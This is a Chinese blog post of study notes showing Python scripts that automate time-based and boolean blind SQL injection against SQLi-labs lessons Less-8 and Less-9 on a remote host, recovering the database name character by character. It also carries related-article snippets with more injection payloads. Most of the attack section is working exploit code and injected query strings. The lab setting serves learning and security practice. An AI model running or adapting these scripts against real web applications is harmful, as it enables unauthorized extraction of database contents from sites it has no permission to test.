python解决盲注和延迟注入笔记

最新推荐文章于 2024-04-09 14:22:03 发布
最新推荐文章于 2024-04-09 14:22:03 发布
阅读量986 收藏 5
点赞数 8
分类专栏: Python杠杠滴
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571759/article/details/104877114
版权

python解决盲注和延迟注入笔记

requests模块

要用python解决这一问题需要了解request这个模块,我下载的是pycharm所以自带这个模块不用安装,需要安装的话

pip install requests

pip命令执行就能安装成功,然后是关于requests模块的一些函数:

get请求post请求
res=request.get(url,params=data)res=request.post(url,data)

这里res是响应response 的缩写;
括号里也有很多参数:
1. url
2. header
3. params(get请求)
4. data(post请求)
5. files
6. cookies
等等;

  • res.text 响应页面内容
  • res.status_code 响应码(200)
  • res.encoding(页面编码)
  • res.content 二进制形式响应正文
  • res,headers响应头部
  • res.cookies 访问cookies
    总之requests是一个功能强大的模块,可以定制头部信息、get传参、post传参、上传文件、重定向、会话跟踪、cookie信息等等;
    为了熟悉这个模块来使用这个模块解决SQL labs中盲注和延时注入的问题,这里只做到暴库这一步,直接上代码截图:

解决延时注入

import requests
import string
url = "http://43.247.91.228:84/Less-9/"
def iftimeout(url):
    try:
        res = requests.get(url,timeout=3)
        return res.text
    except Exception as e:
        return "timeout"
dbnamelen = 0
while True:
    dbnamelen+=1
    dbnamelen_url = url+"?id=1'+and+if(length(database())="+str(dbnamelen)+",sleep(5),1)--+"
    print(dbnamelen_url)
    if "timeout" in iftimeout(dbnamelen_url):
        print("库长:",dbnamelen)
        break
#暴库长   库长为8
dbname=""
for i in range(1,9):
    for j in string.ascii_lowercase:
        dbname_url=url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+j+"',sleep(5),1)--+"
        print(dbname_url)
        if "timeout" in iftimeout(dbname_url):
            dbname+=j
            print("库名:",dbname)
            break
            #暴库名

爆出来的库名
在这里插入图片描述

解决盲注

import requests
import string
url = "http://43.247.91.228:84/Less-8/"
htmlLen = len(requests.get(url=url+"?id=1").text)
print("the len of HTML:"+str(htmlLen))

#暴库长
dbNameLen = 0
while True:
    dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
    print(dbNameLen_url)
    if len(requests.get(dbNameLen_url).text) == htmlLen:
        print("the length of dbName:"+str(dbNameLen))
        break
    if dbNameLen == 30:
        print("Error!")
    dbNameLen+=1

#暴库名
dbName = ""
for i in range(1,9):
    for j in string.ascii_lowercase:
        dbName_url=url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+j+"' --+"
        if len(requests.get(dbName_url).text) == htmlLen:
            dbName += j
            print(dbName)
            break

跑出来的库名和上图一样

总结

python是个好东西得好好学!!!
这也是我看学习视频的总结笔记,很基础,勿喷

humble嘻
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
时间盲注SQL注入
SheXinK’s Blog
12-18 495
时间盲注SQL注入1、 SQL注入介绍2、 报错注入注入PHP代码3、 时间注入测试4、 SQL注入防御 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 报错注入注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,...
时间延迟注入 py脚本
weixin_42819368的博客
04-23 499
import requests import string url = "http://172.16.88.33/Less-5/" ##url = raw_input("Input url :") def sql_sleep(url): try: res = requests.get(url,timeout=3) return res.text except Exception as ...
网络安全笔记-POC与EXP的Python实现
L120305q的博客
09-19 782
网络安全笔记-POC与EXP的Python实现
简单的延时注入EXP
2301_77915293的博客
07-26 66
如果timeout函数返回的响应包含"timeout"字符串,说明请求超时,即数据库名称的第i个字符的ASCII值等于当前遍历的字符的ASCII值,将该字符添加到db_name中,并打印结果。在内层循环中,构造了一个payload参数,通过注入SQL语句来判断数据库名称的每个字符的ASCII值是否等于当前遍历的字符的ASCII值。如果timeout函数返回的响应包含"timeout"字符串,说明请求超时,即数据库名称的长度等于当前循环变量i,将db_len赋值为i,并打印结果。函数的参数是一个URL
【Less-9/10】盲注之时间盲注
ssrf
10-30 483
目录一、知识铺垫二、时间盲注复现1、测试注入点2、爆表名3、爆列名4、爆内容 一、知识铺垫 sql中的if表达式: 语法:IF( expr1 , expr2 , expr3 ) expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 SELECT IF(TRUE,1+1,1+2); -> 2 SELECT IF(FALSE,1+1,1+2); -> 3 SELECT IF(STRCMP("111","222"),"不相等","相等
布尔盲注.py_sql盲注python_
10-03
总之,`布尔盲注.py`是一个用于学习和演示SQL盲注技术的Python脚本。它展示了如何利用Python与数据库交互,通过观察不同查询的响应来获取信息。理解这种攻击手段有助于提高Web应用的安全性,防止恶意用户利用此类...
小甲鱼python教程笔记
08-21
本教程笔记涵盖了 Python 的基础知识点,包括变量、字符串、列表、元组、布尔类型、逻辑运算符、循环结构、列表访问、成员资格运算符、is 运算符、引用和拷贝、列表推导式、元组的使用、字符串的加法和乘法、格式化...
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL盲注的关键在于理解和利用服务器对查询结果的反应,通过一系列的逻辑判断和试错,逐步揭示数据库结构和数据。由于其隐秘性和复杂性,这种攻击方法对网站的安全构成了严重的威胁。为了防止布尔型SQL盲注,...
时间盲注python脚本.zip
12-28
总的来说,时间盲注python脚本是学习和研究SQL注入漏洞的一种工具,它可以帮助我们理解时间盲注的工作原理,提升安全意识,并在合适的环境中进行安全测试。在实际开发中,我们应该充分考虑安全性,防止此类漏洞的...
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1607
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
python sql延时注入脚本(从数据库名到字段)
m0_61815757的博客
04-13 2664
python sql延时盲注脚本
SQL注入延时注入
qq_45557130的博客
10-07 1544
sql注入延时注入
python mysql延时注入,Python系列之——时间盲注脚本编写
weixin_39670857的博客
03-25 329
[Python] 纯文本查看 复制代码#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport timepayloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹配用的字符串user='' #存匹配到的字符的字...
sql注入之延时注入
最新发布
weixin_45653478的博客
04-09 1547
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 4217
SQL注入篇 - 布尔盲注及延时注入
python mysql延时注入_Python:SQLMap源码精读之基于时间的盲注(time-based blind)
weixin_42297665的博客
02-02 578
基于时间的盲注(time-basedblind)测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以确认。这可能源于多种原因,但主要是因为Web应用未显示任何错误,因而无法检索任何数据。对于这种情况,要想识别漏洞,向数据库注入时间延迟并检查服务器响应是否也已经延迟会很有帮助。时间延迟是一种很强大的技术,Web服务器虽然可以隐藏错误或数据,但必须等待数据库返回结果,因此可用它来确认是否存在...
基于时间延迟Python验证脚本
08-05 298
自己写的一段Python脚本,经常拿来验证一些sqlmap等工具跑不出数据的网站。 GET类型: import urllib import urllib2 import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' header = { 'User-Agent' : 'Mozilla/4.0 (comp...
sql盲注如何修补_sql注入数据库修复方法
weixin_39867066的博客
12-21 479
1.第一种情况是 需要将指定的 注入字符串全部替换掉(仅替换注入的字符串为空)declare @delStr nvarchar(500)set @delStr='' --这里被注入的字段串/****************************************//**********以下为操作实体************/set nocount ondeclare @tableName ...
"Python基础语法和数据类型学习笔记
Python学习的基础包括语法、数据类型、控制语句、函数、模块、包、类与继承、字符编码以及数据读写等。...通过学习和实践,我们可以逐步提高自己的Python编程技巧,并且能够利用Python解决实际问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值